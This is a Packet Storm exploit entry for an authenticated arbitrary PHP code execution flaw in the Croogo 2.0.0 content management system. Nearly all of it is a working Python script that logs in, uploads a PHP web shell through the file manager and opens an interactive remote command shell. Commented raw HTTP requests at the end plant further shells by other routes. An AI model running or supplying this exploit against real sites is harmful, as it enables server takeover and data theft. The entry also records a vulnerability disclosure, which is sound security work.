Croogo 2.0.0 Arbitrary PHP Code Execution

2014-10-13T00:00:00
ID PACKETSTORM:128640
Type packetstorm
Reporter LiquidWorm
Modified 2014-10-13T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#  
#  
# Croogo 2.0.0 Arbitrary PHP Code Execution Exploit  
#  
#  
# Vendor: Fahad Ibnay Heylaal  
# Product web page: http://www.croogo.org  
# Affected version: 2.0.0  
#  
# Summary: Croogo is a free, open source, content management system  
# for PHP, released under The MIT License. It is powered by CakePHP  
# MVC framework.  
#  
# Desc: Croogo suffers from an authenticated arbitrary PHP code  
# execution. The vulnerability is caused due to the improper  
# verification of uploaded files in '/admin/file_manager/attachments/add'  
# script thru the 'data[Attachment][file]' POST parameter and in  
# '/admin/file_manager/file_manager/upload' script thru the  
# 'data[FileManager][file]' POST parameter. This can be exploited  
# to execute arbitrary PHP code by uploading a malicious PHP script  
# file that will be stored in '/webroot/uploads/' directory.  
#  
# Tested on: Apache/2.4.7 (Win32)  
# PHP/5.5.6  
# MySQL 5.6.14  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
#  
# Zero Science Lab - http://www.zeroscience.mk  
# Macedonian Information Security Research And Development Laboratory  
#  
#  
# Advisory ID: ZSL-2014-5202  
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5202.php  
#  
# Vendor: http://blog.croogo.org/blog/croogo-210-released  
#  
#  
# 26.07.2014  
#  
#  
  
version = '5.0.0.251'  
  
import itertools, mimetools, mimetypes  
import cookielib, urllib, urllib2, sys  
import logging, os, time, datetime, re  
  
from colorama import Fore, Back, Style, init  
from cStringIO import StringIO  
from urllib2 import URLError  
  
init()  
  
if os.name == 'posix': os.system('clear')  
if os.name == 'nt': os.system('cls')  
piton = os.path.basename(sys.argv[0])  
  
def bannerche():  
print '''  
@---------------------------------------------------------------@  
| |  
| Croogo 2.0.0 Arbitrary PHP Code Execution Exploit |  
| |  
| |  
| ID: ZSL-2014-5202 |  
| |  
| Copyleft (c) 2014, Zero Science Lab |  
| |  
@---------------------------------------------------------------@  
'''  
if len(sys.argv) < 3:  
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'  
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk croogo\n'  
sys.exit()  
  
bannerche()  
  
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET  
  
host = sys.argv[1]  
path = sys.argv[2]  
  
cj = cookielib.CookieJar()  
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  
  
try:  
getcsrf = opener.open('http://'+host+'/'+path+'/admin/users/users/login')  
csrf = getcsrf.read()  
except urllib2.HTTPError, errorzio:  
if errorzio.code == 404:  
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET  
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET  
print  
sys.exit()  
except URLError, errorziocvaj:  
if errorziocvaj.reason:  
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET  
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET  
print  
sys.exit()  
  
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET  
  
token_key = re.search(r'\[key\]\" value=\"(.+?)\"', csrf).group(1)  
print '\x20\x20[*] Retrieving login CSRF token '+'.'*27+Fore.GREEN+'[OK]'+Fore.RESET  
print '\x20\x20[*] Login CSRF token: '+Fore.YELLOW+token_key+Fore.RESET  
  
print '\x20\x20[*] Login please.'  
  
username = raw_input('\x20\x20[*] Enter username: ')  
password = raw_input('\x20\x20[*] Enter password: ')  
  
  
login_data = urllib.urlencode({  
'_method' : 'POST',  
'data[User][password]' : password,  
'data[User][remember]' : '0',  
'data[User][username]' : username,  
'data[_Token][fields]' : '93365ba06ce101995d3cd9c79cce968b12fb6ee5:',  
'data[_Token][key]' : token_key,  
'data[_Token][unlocked]' : ''  
})  
  
  
login = opener.open('http://'+host+'/'+path+'/admin/users/users/login', login_data)  
auth = login.read()  
  
for session in cj:  
sessid = session.name  
  
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET  
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))  
cookie = ses_chk.group(0)  
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET  
  
if re.search(r'Incorrect username or password', auth):  
print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET  
print  
sys.exit()  
else:  
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET  
  
getcsrfattach = opener.open('http://'+host+'/'+path+'/admin/file_manager/attachments/add')  
csrfattach = getcsrfattach.read()  
token_key2 = re.search(r'\[key\]\" value=\"(.+?)\"', csrfattach).group(1)  
print '\x20\x20[*] Retrieving upload CSRF token '+'.'*26+Fore.GREEN+'[OK]'+Fore.RESET  
print '\x20\x20[*] Upload CSRF token: '+Fore.YELLOW+token_key2+Fore.RESET  
  
class MultiPartForm(object):  
  
def __init__(self):  
self.form_fields = []  
self.files = []  
self.boundary = mimetools.choose_boundary()  
return  
  
def get_content_type(self):  
return 'multipart/form-data; boundary=%s' % self.boundary  
  
def add_field(self, name, value):  
self.form_fields.append((name, value))  
return  
  
def add_file(self, fieldname, filename, fileHandle, mimetype=None):  
body = fileHandle.read()  
if mimetype is None:  
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'  
self.files.append((fieldname, filename, mimetype, body))  
return  
  
def __str__(self):  
  
parts = []  
part_boundary = '--' + self.boundary  
  
parts.extend(  
[ part_boundary,  
'Content-Disposition: form-data; name="%s"' % name,  
'',  
value,  
]  
for name, value in self.form_fields  
)  
  
parts.extend(  
[ part_boundary,  
'Content-Disposition: file; name="%s"; filename="%s"' % \  
(field_name, filename),  
'Content-Type: %s' % content_type,  
'',  
body,  
]  
for field_name, filename, content_type, body in self.files  
)  
  
flattened = list(itertools.chain(*parts))  
flattened.append('--' + self.boundary + '--')  
flattened.append('')  
return '\r\n'.join(flattened)  
  
if __name__ == '__main__':  
  
form = MultiPartForm()  
form.add_field('_method', 'POST')  
form.add_field('data[_Token][key]', token_key2)  
form.add_field('data[_Token][fields]', 'c0c3f5d102d9672429f5c571a5f45c34255a93a9%3A')  
form.add_field('data[_Token][unlocked]', '')  
  
form.add_file('data[Attachment][file]', 'zsl.php',   
fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))  
  
request = urllib2.Request('http://'+host+'/'+path+'/admin/file_manager/attachments/add')  
request.add_header('User-agent', 'joxypoxy 5.0')  
body = str(form)  
request.add_header('Content-type', form.get_content_type())  
request.add_header('Cookie', cookie)  
request.add_header('Content-length', len(body))  
request.add_data(body)  
request.get_data()  
urllib2.urlopen(request).read()  
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET  
  
  
print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET  
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET  
time.sleep(1)  
  
furl = '/uploads/zsl.php'  
#furl = '/webroot/uploads/zsl.php'  
  
print  
today = datetime.date.today()  
fname = 'croogo-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'  
logging.basicConfig(filename=fname,level=logging.DEBUG)  
  
logging.info(' '+'+'*75)  
logging.info(' +')  
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))  
logging.info(' + Title: Croogo 2.0.0 Arbitrary PHP Code Execution Exploit')  
logging.info(' + Python program executed: '+sys.argv[0])  
logging.info(' + Version: '+version)  
logging.info(' + Full query: \''+piton+'\x20'+host+'\'')  
logging.info(' + Username input: '+username)  
logging.info(' + Password input: '+password)  
logging.info(' + Vector: '+'http://'+host+'/'+path+furl)  
logging.info(' +')  
logging.info(' + Advisory ID: ZSL-2014-5202')  
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')  
logging.info(' +')  
logging.info(' '+'+'*75+'\n')  
  
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET  
raw_input()  
while True:  
try:  
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)  
execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd))  
reverse = execute.read()  
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)  
  
print Style.BRIGHT+Fore.CYAN  
cmdout = pattern.match(reverse)  
print cmdout.groups()[0].strip()  
print Style.RESET_ALL+Fore.RESET  
  
if cmd.strip() == 'exit':  
break  
  
logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')  
except Exception:  
break  
  
logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')  
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET  
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET  
print  
  
sys.exit()  
  
#  
## OTHER ##  
#  
#  
# Arbitrary file creation any location:  
#  
# - http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A\xampp\htdocs\croogo\  
#  
#  
# Arbitrary file upload any location:  
# - http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5C  
#  
#  
###########  
#  
# POST /croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1  
# Host: localhost  
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0  
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
# Accept-Language: en-US,en;q=0.5  
# Accept-Encoding: gzip, deflate  
# Referer: http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C  
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84  
# Connection: keep-alive  
# Content-Type: application/x-www-form-urlencoded  
# Content-Length: 229  
#  
# _method=POST&data%5B_Token%5D%5Bkey%5D=4f20867747cbff33951db804266494804e96bf89&data%5BFileManager%5D%5Bname%5D=shell2.php&data%5B_Token%5D%5Bfields%5D=4aeda1af05803a2ae8503d6033160c17d6335641%253A&data%5B_Token%5D%5Bunlocked%5D=  
#  
###########  
#  
# POST /croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php HTTP/1.1  
# Host: localhost  
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0  
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
# Accept-Language: en-US,en;q=0.5  
# Accept-Encoding: gzip, deflate  
# Referer: http://localhost/croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php  
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84  
# Connection: keep-alive  
# Content-Type: application/x-www-form-urlencoded  
# Content-Length: 304  
#  
# _method=POST&data%5B_Token%5D%5Bkey%5D=5a6516e263eb6e5504e2266783b42cd08e3efe16&data%5BFileManager%5D%5Bcontent%5D=test%0D%0A%3C%3Fphp%0D%0Apassthru%28%24_GET%5B%27cmd%27%5D%29%3B%0D%0A%3F%3E%0D%0A&data%5B_Token%5D%5Bfields%5D=8f1bb3e7acda642ca69ee0430abba1f5ecd5f7a7%253A&data%5B_Token%5D%5Bunlocked%5D=  
#  
###########  
#  
# POST /croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1  
# Host: localhost  
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0  
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
# Accept-Language: en-US,en;q=0.5  
# Accept-Encoding: gzip, deflate  
# Referer: http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C  
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84  
# Connection: keep-alive  
# Content-Type: multipart/form-data; boundary=---------------------------25555888422431  
# Content-Length: 779  
#  
# -----------------------------25555888422431  
# Content-Disposition: form-data; name="_method"  
#  
# POST  
# -----------------------------25555888422431  
# Content-Disposition: form-data; name="data[_Token][key]"  
#  
# 0d940d3b3f4c80ea98b3e5588c337587f7c50d5e  
# -----------------------------25555888422431  
# Content-Disposition: form-data; name="data[FileManager][file]"; filename="exploit.php"  
# Content-Type: application/octet-stream  
#  
# test  
# <?php  
# passthru($_GET['cmd']);  
# ?>  
#  
# -----------------------------25555888422431  
# Content-Disposition: form-data; name="data[_Token][fields]"  
#  
# 6f3f788048d33beefcc340fe281cf758e20ad329%3A  
# -----------------------------25555888422431  
# Content-Disposition: form-data; name="data[_Token][unlocked]"  
#  
#  
# -----------------------------25555888422431--  
#  
#  
`